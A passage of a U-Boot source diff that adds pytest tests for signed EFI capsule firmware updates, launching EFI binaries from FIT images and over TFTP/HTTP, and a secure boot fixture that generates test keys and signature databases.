+@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareSignedRaw(): + """Firmware Update (Signed capsule with raw images) 
Test + """ + + def test_efi_capsule_auth1( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 1 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test11'] + with ubman.log.section('Test Case 1-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:New') + + def test_efi_capsule_auth2( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 2 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but with an invalid key, + the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test12'] + with ubman.log.section('Test Case 2-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(ubman, '100000', 'u-boot:Old') + + def test_efi_capsule_auth3( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 3 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is not signed, the authentication + should fail and the firmware not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test02'] + with ubman.log.section('Test Case 3-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted anyway + check_file_removed(ubman, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(ubman, '100000', 'u-boot:Old') + + def test_efi_capsule_auth4( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 4 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. 
+ """ + disk_img = efi_capsule_data + capsule_files = ['Test111', 'Test112'] + with ubman.log.section('Test Case 4-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + output = ubman.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '985F2937-7C2E-5E9A-8A5E-8E063312964B' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT. + assert '9E339473-C2EB-530A-A69B-0CD6BBBED40E' in ''.join(output) + assert 'ESRT: fw_version=10' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=7' in ''.join(output) + + verify_content(ubman, '100000', 'u-boot:New') + verify_content(ubman, '150000', 'u-boot-env:New') + + def test_efi_capsule_auth5( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 5 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but fw_version is lower than lowest + supported version, the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test113'] + with ubman.log.section('Test Case 5-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/version.dtso b/test/py/tests/test_efi_capsule/version.dtso new file mode 100644 index 00000000000..3aebb5b64fb --- /dev/null +++ b/test/py/tests/test_efi_capsule/version.dtso @@ -0,0 +1,24 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; +/plugin/; + +&{/} { + firmware-version { + image1 { + lowest-supported-version = <3>; + image-index = <1>; + image-type-id = "985F2937-7C2E-5E9A-8A5E-8E063312964B"; + }; + image2 { + lowest-supported-version = <7>; + image-index = <2>; + image-type-id = "9E339473-C2EB-530A-A69B-0CD6BBBED40E"; + }; + image3 { + lowest-supported-version = <3>; + image-index = <1>; + image-type-id = "46610520-469E-59DC-A8DD-C11832B877EA"; + }; + }; +}; diff --git a/test/py/tests/test_efi_fit.py b/test/py/tests/test_efi_fit.py new file mode 100644 index 00000000000..5f352e7efff --- /dev/null +++ b/test/py/tests/test_efi_fit.py @@ -0,0 +1,467 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2019, Cristian Ciocaltea <cristian.ciocaltea@gmail.com> +# +# Work based on: +# - test_net.py +# Copyright (c) 2016, NVIDIA CORPORATION. 
All rights reserved. +# - test_fit.py +# Copyright (c) 2013, Google Inc. +# +# Test launching UEFI binaries from FIT images. + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, the parts +that rely on network will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +# Additionally, when the 'size' is not available, the file will be generated +# automatically in the TFTP root directory, as specified by the 'dn' field. +env__efi_fit_tftp_file = { + 'fn': 'test-efi-fit.img', # File path relative to TFTP root + 'size': 3831, # File size + 'crc32': '9fa3f79c', # Checksum using CRC-32 algorithm, optional + 'addr': 0x40400000, # Loading address, integer, optional + 'dn': 'tftp/root/dir', # TFTP root directory path, optional +} +""" + +import os.path +import pytest +import utils + +# Define the parametrized ITS data to be used for FIT images generation. +ITS_DATA = ''' +/dts-v1/; + +/ { + description = "EFI image with FDT blob"; + #address-cells = <1>; + + images { + efi { + description = "Test EFI"; + data = /incbin/("%(efi-bin)s"); + type = "%(kernel-type)s"; + arch = "%(sys-arch)s"; + os = "efi"; + compression = "%(efi-comp)s"; + load = <0x0>; + entry = <0x0>; + }; + fdt { + description = "Test FDT"; + data = /incbin/("%(fdt-bin)s"); + type = "flat_dt"; + arch = "%(sys-arch)s"; + compression = "%(fdt-comp)s"; + }; + }; + + configurations { + default = "config-efi-fdt"; + config-efi-fdt { + description = "EFI FIT w/ FDT"; + kernel = "efi"; + fdt = "fdt"; + }; + config-efi-nofdt { + description = "EFI FIT w/o FDT"; + kernel = "efi"; + }; + }; +}; +''' + +# Define the parametrized FDT data to be used for DTB images generation. +FDT_DATA = ''' +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + model = "%(sys-arch)s %(fdt_type)s EFI FIT Boot Test"; + compatible = "%(sys-arch)s"; + + reset@0 { + compatible = "%(sys-arch)s,reset"; + reg = <0 4>; + }; +}; +''' + +@pytest.mark.buildconfigspec('bootm_efi') +@pytest.mark.buildconfigspec('BOOTEFI_HELLO_COMPILE') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.notbuildconfigspec('generate_acpi_table') +@pytest.mark.requiredtool('dtc') +def test_efi_fit_launch(ubman): + """Test handling of UEFI binaries inside FIT images. + + The tests are trying to launch U-Boot's helloworld.efi embedded into + FIT images, in uncompressed or gzip compressed format. 
+ + Additionally, a sample FDT blob is created and embedded into the above + mentioned FIT images, in uncompressed or gzip compressed format. + + For more details, see launch_efi(). + + The following test cases are currently defined and enabled: + - Launch uncompressed FIT EFI & internal FDT + - Launch uncompressed FIT EFI & FIT FDT + - Launch compressed FIT EFI & internal FDT + - Launch compressed FIT EFI & FIT FDT + """ + + def net_pre_commands(): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment + at the beginning of this file. + """ + + init_usb = ubman.config.env.get('env__net_uses_usb', False) + if init_usb: + ubman.run_command('usb start') + + init_pci = ubman.config.env.get('env__net_uses_pci', False) + if init_pci: + ubman.run_command('pci enum') + + def net_dhcp(): + """Execute the dhcp command. + + The boardenv_* file may be used to enable/disable DHCP; see the + comment at the beginning of this file. + """ + + has_dhcp = ubman.config.buildconfig.get('config_cmd_dhcp', 'n') == 'y' + if not has_dhcp: + ubman.log.warning('CONFIG_CMD_DHCP != y: Skipping DHCP network setup') + return False + + test_dhcp = ubman.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + ubman.log.info('No DHCP server available') + return False + + ubman.run_command('setenv autoload no') + output = ubman.run_command('dhcp') + assert 'DHCP client bound to address ' in output + return True + + def net_setup_static(): + """Set up a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + has_dhcp = ubman.config.buildconfig.get('config_cmd_dhcp', 'n') == 'y' + if not has_dhcp: + ubman.log.warning('CONFIG_NET != y: Skipping static network setup') + return False + + env_vars = ubman.config.env.get('env__net_static_env_vars', None) + if not env_vars: + ubman.log.info('No static network configuration is defined') + return False + + for (var, val) in env_vars: + ubman.run_command('setenv %s %s' % (var, val)) + return True + + def make_fpath(file_name): + """Compute the path of a given (temporary) file. + + Args: + file_name -- The name of a file within U-Boot build dir. + Return: + The computed file path. + """ + + return os.path.join(ubman.config.build_dir, file_name) + + def make_efi(fname, comp): + """Create an UEFI binary. + + This simply copies lib/efi_loader/helloworld.efi into U-Boot + build dir and, optionally, compresses the file using gzip. + + Args: + fname -- The target file name within U-Boot build dir. + comp -- Flag to enable gzip compression. + Return: + The path of the created file. + """ + + bin_path = make_fpath(fname) + utils.run_and_log(ubman, + ['cp', make_fpath('lib/efi_loader/helloworld.efi'), + bin_path]) + if comp: + utils.run_and_log(ubman, ['gzip', '-f', bin_path]) + bin_path += '.gz' + return bin_path + + def make_dtb(fdt_type, comp): + """Create a sample DTB file. + + Creates a DTS file and compiles it to a DTB. + + Args: + fdt_type -- The type of the FDT, i.e. internal, user. + comp -- Flag to enable gzip compression. + Return: + The path of the created file. + """ + + # Generate resources referenced by FDT. + fdt_params = { + 'sys-arch': sys_arch, + 'fdt_type': fdt_type, + } + + # Generate a test FDT file. + dts = make_fpath('test-efi-fit-%s.dts' % fdt_type) + with open(dts, 'w', encoding='ascii') as file: + file.write(FDT_DATA % fdt_params) + + # Build the test FDT. 
+ dtb = make_fpath('test-efi-fit-%s.dtb' % fdt_type) + utils.run_and_log(ubman, + ['dtc', '-I', 'dts', '-O', 'dtb', '-o', dtb, dts]) + if comp: + utils.run_and_log(ubman, ['gzip', '-f', dtb]) + dtb += '.gz' + return dtb + + def make_fit(comp): + """Create a sample FIT image. + + Runs 'mkimage' to create a FIT image within U-Boot build dir. + Args: + comp -- Enable gzip compression for the EFI binary and FDT blob. + Return: + The path of the created file. + """ + + # Generate resources referenced by ITS. + its_params = { + 'sys-arch': sys_arch, + 'efi-bin': os.path.basename(make_efi('test-efi-fit-helloworld.efi', comp)), + 'kernel-type': 'kernel' if comp else 'kernel_noload', + 'efi-comp': 'gzip' if comp else 'none', + 'fdt-bin': os.path.basename(make_dtb('user', comp)), + 'fdt-comp': 'gzip' if comp else 'none', + } + + # Generate a test ITS file. + its_path = make_fpath('test-efi-fit-helloworld.its') + with open(its_path, 'w', encoding='ascii') as file: + file.write(ITS_DATA % its_params) + + # Build the test ITS. + fit_path = make_fpath('test-efi-fit-helloworld.fit') + utils.run_and_log( + ubman, [make_fpath('tools/mkimage'), '-f', its_path, fit_path]) + return fit_path + + def load_fit_from_host(fit): + """Load the FIT image using the 'host load' command and return its address. + + Args: + fit -- Dictionary describing the FIT image to load, see + env__efi_fit_test_file in the comment at the beginning of + this file. + Return: + The address where the file has been loaded. + """ + + addr = fit.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + output = ubman.run_command( + 'host load hostfs - %x %s/%s' % (addr, fit['dn'], fit['fn'])) + expected_text = ' bytes read' + size = fit.get('size', None) + if size: + expected_text = '%d' % size + expected_text + assert expected_text in output + + return addr + + def load_fit_from_tftp(fit): + """Load the FIT image using the tftpboot command and return its address. + + The file is downloaded from the TFTP server, its size and optionally its + CRC32 are validated. + + Args: + fit -- Dictionary describing the FIT image to load, see env__efi_fit_tftp_file + in the comment at the beginning of this file. + Return: + The address where the file has been loaded. + """ + + addr = fit.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + file_name = fit['fn'] + output = ubman.run_command('tftpboot %x %s' % (addr, file_name)) + expected_text = 'Bytes transferred = ' + size = fit.get('size', None) + if size: + expected_text += '%d' % size + assert expected_text in output + + expected_crc = fit.get('crc32', None) + if not expected_crc: + return addr + + if ubman.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return addr + + output = ubman.run_command('crc32 $fileaddr $filesize') + assert expected_crc in output + + return addr + + def launch_efi(enable_fdt, enable_comp): + """Launch U-Boot's helloworld.efi binary from a FIT image. + + An external image file can be downloaded from TFTP, when related + details are provided by the boardenv_* file; see the comment at the + beginning of this file. + + If the size of the TFTP file is not provided within env__efi_fit_tftp_file, + the test image is generated automatically and placed in the TFTP root + directory specified via the 'dn' field. + + When running the tests on Sandbox, the image file is loaded directly + from the host filesystem. 
+ + Once the load address is available on U-Boot console, the 'bootm' + command is executed for either 'config-efi-fdt' or 'config-efi-nofdt' + FIT configuration, depending on the value of the 'enable_fdt' function + argument. + + Eventually the 'Hello, world' message is expected in the U-Boot console. + + Args: + enable_fdt -- Flag to enable using the FDT blob inside FIT image. + enable_comp -- Flag to enable GZIP compression on EFI and FDT + generated content. + """ + + with ubman.log.section('FDT=%s;COMP=%s' % (enable_fdt, enable_comp)): + if is_sandbox: + fit = { + 'dn': ubman.config.build_dir, + } + else: + # Init networking. + net_pre_commands() + net_set_up = net_dhcp() + net_set_up = net_setup_static() or net_set_up + if not net_set_up: + pytest.skip('Network not initialized') + + fit = ubman.config.env.get('env__efi_fit_tftp_file', None) + if not fit: + pytest.skip('No env__efi_fit_tftp_file binary specified in environment') + + size = fit.get('size', None) + if not size: + if not fit.get('dn', None): + pytest.skip('Neither "size", nor "dn" info provided in env__efi_fit_tftp_file') + + # Create test FIT image. + fit_path = make_fit(enable_comp) + fit['fn'] = os.path.basename(fit_path) + fit['size'] = os.path.getsize(fit_path) + + # Copy image to TFTP root directory. + if fit['dn'] != ubman.config.build_dir: + utils.run_and_log(ubman, + ['mv', '-f', fit_path, '%s/' % fit['dn']]) + + # Load FIT image. + addr = load_fit_from_host(fit) if is_sandbox else load_fit_from_tftp(fit) + + # Select boot configuration. + fit_config = 'config-efi-fdt' if enable_fdt else 'config-efi-nofdt' + + # Try booting. + output = ubman.run_command('bootm %x#%s' % (addr, fit_config)) + if enable_fdt: + assert 'Booting using the fdt blob' in output + assert 'Hello, world' in output + assert '## Application failed' not in output + ubman.restart_uboot() + + # Array slice removes leading/trailing quotes. + sys_arch = ubman.config.buildconfig.get('config_sys_arch', '"sandbox"')[1:-1] + if sys_arch == 'arm': + arm64 = ubman.config.buildconfig.get('config_arm64') + if arm64: + sys_arch = 'arm64' + + is_sandbox = sys_arch == 'sandbox' + + if is_sandbox: + old_dtb = ubman.config.dtb + + try: + if is_sandbox: + # Use our own device tree file, will be restored afterwards. + control_dtb = make_dtb('internal', False) + ubman.config.dtb = control_dtb + + # Run tests + # - fdt OFF, gzip OFF + launch_efi(False, False) + # - fdt ON, gzip OFF + launch_efi(True, False) + + if is_sandbox: + # - fdt OFF, gzip ON + launch_efi(False, True) + # - fdt ON, gzip ON + launch_efi(True, True) + + finally: + if is_sandbox: + # Go back to the original U-Boot with the correct dtb. + ubman.config.dtb = old_dtb + ubman.restart_uboot() diff --git a/test/py/tests/test_efi_loader.py b/test/py/tests/test_efi_loader.py new file mode 100644 index 00000000000..58f2655191f --- /dev/null +++ b/test/py/tests/test_efi_loader.py @@ -0,0 +1,236 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. +# Copyright (c) 2016, Alexander Graf <agraf@suse.de> +# +# based on test_net.py. + +# Test efi loader implementation + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, the parts +that rely on network will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. 
+# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +env__efi_loader_helloworld_file = { + 'fn': 'lib/efi_loader/helloworld.efi', # file name + 'size': 5058624, # file length in bytes + 'crc32': 'c2244b26', # CRC32 check sum + 'addr': 0x40400000, # load address +} + +# False if the helloworld EFI over HTTP boot test should be performed. +# If HTTP boot testing is not possible or desired, set this variable to True or +# ommit it. +env__efi_helloworld_net_http_test_skip = True +""" + +import pytest +import utils + +PROTO_TFTP, PROTO_HTTP = range(0, 2) + +net_set_up = False + +def test_efi_pre_commands(ubman): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment at the + beginning of this file. + """ + + init_usb = ubman.config.env.get('env__net_uses_usb', False) + if init_usb: + ubman.run_command('usb start') + + init_pci = ubman.config.env.get('env__net_uses_pci', False) + if init_pci: + ubman.run_command('pci enum') + +@pytest.mark.buildconfigspec('cmd_dhcp') +def test_efi_setup_dhcp(ubman): + """Set up the network using DHCP. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp = ubman.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + env_vars = ubman.config.env.get('env__net_static_env_vars', None) + if not env_vars: + pytest.skip('No DHCP server available') + return + + ubman.run_command('setenv autoload no') + output = ubman.run_command('dhcp') + assert 'DHCP client bound to address ' in output + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('net') +def test_efi_setup_static(ubman): + """Set up the network using a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + env_vars = ubman.config.env.get('env__net_static_env_vars', None) + if not env_vars: + test_dhcp = ubman.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No static network configuration is defined') + return None + + for (var, val) in env_vars: + ubman.run_command('setenv %s %s' % (var, val)) + + global net_set_up + net_set_up = True + +def fetch_file(ubman, env_conf, proto): + """Grab an env described file via TFTP or HTTP and return its address + + A file as described by an env config <env_conf> is downloaded from the + server. The address to that file is returned. 
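+    The env config dictionary is expected to provide at least 'fn' (file
+    name); 'addr', 'size' and 'crc32' are optional, as in the
+    env__efi_loader_helloworld_file example above.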
+ """ + if not net_set_up: + pytest.skip('Network not initialized') + + f = ubman.config.env.get(env_conf, None) + if not f: + pytest.skip('No %s binary specified in environment' % env_conf) + + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + fn = f['fn'] + if proto == PROTO_TFTP: + cmd = 'tftpboot' + elif proto == PROTO_HTTP: + cmd = 'wget' + else: + assert False + output = ubman.run_command('%s %x %s' % (cmd, addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return addr + + if ubman.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return addr + + output = ubman.run_command('crc32 %x $filesize' % addr) + assert expected_crc in output + + return addr + +def do_test_efi_helloworld_net(ubman, proto): + addr = fetch_file(ubman, 'env__efi_loader_helloworld_file', proto) + + output = ubman.run_command('bootefi %x' % addr) + expected_text = 'Hello, world' + assert expected_text in output + expected_text = '## Application failed' + assert expected_text not in output + +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.buildconfigspec('bootefi_hello_compile') +@pytest.mark.buildconfigspec('cmd_tftpboot') +def test_efi_helloworld_net_tftp(ubman): + """Run the helloworld.efi binary via TFTP. + + The helloworld.efi file is downloaded from the TFTP server and is executed + using the fallback device tree at $fdtcontroladdr. + """ + + do_test_efi_helloworld_net(ubman, PROTO_TFTP); + +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.buildconfigspec('bootefi_hello_compile') +@pytest.mark.buildconfigspec('cmd_wget') +def test_efi_helloworld_net_http(ubman): + """Run the helloworld.efi binary via HTTP. + + The helloworld.efi file is downloaded from the HTTP server and is executed + using the fallback device tree at $fdtcontroladdr. + """ + if ubman.config.env.get('env__efi_helloworld_net_http_test_skip', True): + pytest.skip('helloworld.efi HTTP test is not enabled!') + + do_test_efi_helloworld_net(ubman, PROTO_HTTP); + +@pytest.mark.buildconfigspec('cmd_bootefi_hello') +def test_efi_helloworld_builtin(ubman): + """Run the builtin helloworld.efi binary. + + The helloworld.efi file is included in U-Boot, execute it using the + special "bootefi hello" command. + """ + + output = ubman.run_command('bootefi hello') + expected_text = 'Hello, world' + assert expected_text in output + +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.buildconfigspec('cmd_bootefi') +@pytest.mark.buildconfigspec('cmd_tftpboot') +def test_efi_grub_net(ubman): + """Run the grub.efi binary via TFTP. + + The grub.efi file is downloaded from the TFTP server and gets + executed. 
+ """ + + addr = fetch_file(ubman, 'env__efi_loader_grub_file', PROTO_TFTP) + + ubman.run_command('bootefi %x' % addr, wait_for_prompt=False) + + # Verify that we have an SMBIOS table + check_smbios = ubman.config.env.get('env__efi_loader_check_smbios', False) + if check_smbios: + ubman.wait_for('grub>') + ubman.run_command('lsefisystab', wait_for_prompt=False, wait_for_echo=False) + ubman.wait_for('SMBIOS') + + # Then exit cleanly + ubman.wait_for('grub>') + ubman.run_command('exit', wait_for_prompt=False, wait_for_echo=False) + ubman.wait_for(ubman.prompt) + # And give us our U-Boot prompt back + ubman.run_command('') diff --git a/test/py/tests/test_efi_secboot/conftest.py b/test/py/tests/test_efi_secboot/conftest.py new file mode 100644 index 00000000000..0fa0747fc76 --- /dev/null +++ b/test/py/tests/test_efi_secboot/conftest.py @@ -0,0 +1,254 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""Fixture for UEFI secure boot test.""" + +from subprocess import call, check_call, CalledProcessError +import pytest +from defs import * + +@pytest.fixture(scope='session') +def efi_boot_env(request, u_boot_config): + """Set up a file system to be used in UEFI secure boot test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + image_path = u_boot_config.persistent_data_dir + image_path = image_path + '/test_efi_secboot.img' + + try: + mnt_point = u_boot_config.build_dir + '/mnt_efisecure' + check_call('rm -rf {}'.format(mnt_point), shell=True) + check_call('mkdir -p {}'.format(mnt_point), shell=True) + + # suffix + # *.key: RSA private key in PEM + # *.crt: X509 certificate (self-signed) in PEM + # *.esl: signature list + # *.hash: message digest of image as signature list + # *.auth: signed signature list in signature database format + # *.efi: UEFI image + # *.efi.signed: signed UEFI image + + # Create signature database + # PK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_PK/ -keyout PK.key -out PK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s PK.crt PK.esl; %ssign-efi-sig-list -t "2020-04-01" -c PK.crt -k PK.key PK PK.esl PK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # PK_null for deletion + check_call('cd %s; touch PK_null.esl; %ssign-efi-sig-list -t "2020-04-02" -c PK.crt -k PK.key PK PK_null.esl PK_null.auth' + % (mnt_point, EFITOOLS_PATH), shell=True) + # KEK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_KEK/ -keyout KEK.key -out KEK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s KEK.crt KEK.esl; %ssign-efi-sig-list -t "2020-04-03" -c PK.crt -k PK.key KEK KEK.esl KEK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # db + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_db/ -keyout db.key -out db.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s db.crt db.esl; %ssign-efi-sig-list -t "2020-04-04" -c KEK.crt -k KEK.key db db.esl db.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # db1 + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_db1/ -keyout db1.key -out db1.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; 
%scert-to-efi-sig-list -g %s db1.crt db1.esl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key db db1.esl db1.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # db2 (APPEND_WRITE) + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_db2/ -keyout db2.key -out db2.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s db2.crt db2.esl; %ssign-efi-sig-list -a -c KEK.crt -k KEK.key db db2.esl db2.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx (TEST_dbx certificate) + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_dbx/ -keyout dbx.key -out dbx.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s dbx.crt dbx.esl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx.esl dbx.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_hash (digest of TEST_db certificate) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 256 db.crt dbx_hash.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash.crl dbx_hash.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 384 db.crt dbx_hash384.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash384.crl dbx_hash384.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 512 db.crt dbx_hash512.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash512.crl dbx_hash512.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_hash1 (digest of TEST_db1 certificate) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 256 db1.crt 